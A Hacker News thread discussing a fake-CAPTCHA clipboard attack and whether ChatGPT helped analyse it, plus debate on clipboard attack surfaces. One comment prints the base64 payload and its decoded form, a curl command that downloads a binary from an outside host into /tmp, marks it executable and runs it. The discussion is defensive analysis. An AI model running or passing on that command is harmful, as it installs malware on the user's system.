Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

[flagged]


He asked ChatGPT to run the command in a sterile environment. He knew it was a bad idea to start with. It's a quick and dirty method in case you don't have a virgin VM lying around to try random scripts on to see what they do.

I'd say something edgy about paying attention but that wouldn't be nice.


It's a bad idea to try to execute a malicious string in any environment, but the payload is just base64 text and it's safe to decode if you understand how to use the command line.

Look, I just deciphered it in Termux on my phone:

~ $ echo "Y3VybCAtc0wgLW8gL3RtcC9wakttTVVGRVl2OEFsZktSIGh0dHBzOi8vd3d3LmFtYW5hZ2VuY2llcy5jb20vYXNzZXRzL2pzL2dyZWNhcHRjaGE7IGNobW9kICt4IC90bXAvcGpLbU1VRkVZdjhBbGZLUjsgL3RtcC9wakttTVVGRVl2OEFsZktS" | base64 -d

curl -sL -o /tmp/pjKmMUFEYv8AlfKR https://www.amanagencies.com/assets/js/grecaptcha; chmod +x /tmp/pjKmMUFEYv8AlfKR; /tmp/pjKmMUFEYv8AlfKR~ $

Did ChatGPT do ANYTHING useful in this blog? No, but it probably cost more than it did when I ran base64 -d on my phone lol and if you want updoots on the Orange Site you had better mention LLMs

If I was more paranoid I could've used someone else's computer to decipher the text but I wanted to make a point.


ChatGPT doesn't run commands, does it?


That's probably bordering on a philosophical question.

Am I "running" code if follow the control flow and say "Hello World!" out loud?


It can


Geez... echo [some garble] | base64 | bash , and you'd spin up a VM to diagnose it?

I'd google a base64 decoder and paste the "[some garble]" in...


The command helpfully already tells you where you can find a base64 decoder: it's in /usr/bin/base64.

Assuming you already have a ChatGPT window handy, which many people do these days, I don't think it's any worse to paste it there and ask the LLM to decode it, and avoid the risk that you copy and pasted the "| bash" as well.


Was this a mistake too?

>The command they had copied to my clipboard was this

but couldn't someone attack here? you think you're selecting a small bit of text but actually copying something much larger into the clipboard that "overflows" into memory? (sorry not my area so i don't know if this is feasible)


The engineers who wrote your browser already thought of this and made sure it wouldn't work.

In case anyone mocks you for this, though, it's not a stupid question at all: there have been 1-click and 0-click attacks with vectors barely more sophisticated than this. But I feel 100% confident that in 2025 no browser can be exploited just by copying a malicious string.


>But I feel 100% confident that in 2025 no browser can be exploited just by copying a malicious string.

that's a real far leap. Most OS have a shared clipboard, and a lot of them run processes that watch the thing for events. That attack surface is so large that 100% certainty is a very hard sell to me.

Just for the sake of arguement, say clipboard_manager.sh sees a malicious string copied from a site by the browser to the system clipboard that somehow poisons that process. clipboard_manager.sh then proceeds to exfiltrate browser data via the OS/fs rather than via the browser process at all, starts keylogging (trivial in most nix), and just for the sake of throwing gas on the fire it joins the local adversarial botnet and starts churnin captchas or coins or whatever.

Was the browser exploited? ehh. no -- but it most definitely facilitated the attack by which it became victimized. It feels like semantics at that point.


This is a good point and it completely fits serf's concern. So OK, I change my answer, it is reasonable to be concerned about exploits from just copying malicious content to the clipboard.


> as ChatGPT confirmed

Tech support knew it was not a good idea. ChatGPT was used to throughly explain why that was a bad idea. Are you trying to make other people look dumb because you need to feel smarter than others for some reason? That's gross.


ChatGPT didn't confirm anything! It didn't even output the decoded text. It made a guess that happened to be correct, at a greater expense than real forensics and less confidence.

In order to use the ChatGPT response, in order to avoid looking like an idiot, the first thing I would have to do is confirm it, because ChatGPT is very good at guessing and absolutely incapable of confirming

Using base64 -d and looking at the malicious code would be confirming it. Did ChatGPT do that? Nobody ducking knows


If you use one of the CLIs like Claude Code, Codex, or Gemini CLI, they can confirm things and they let you know and require authorization when running tools like base64.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: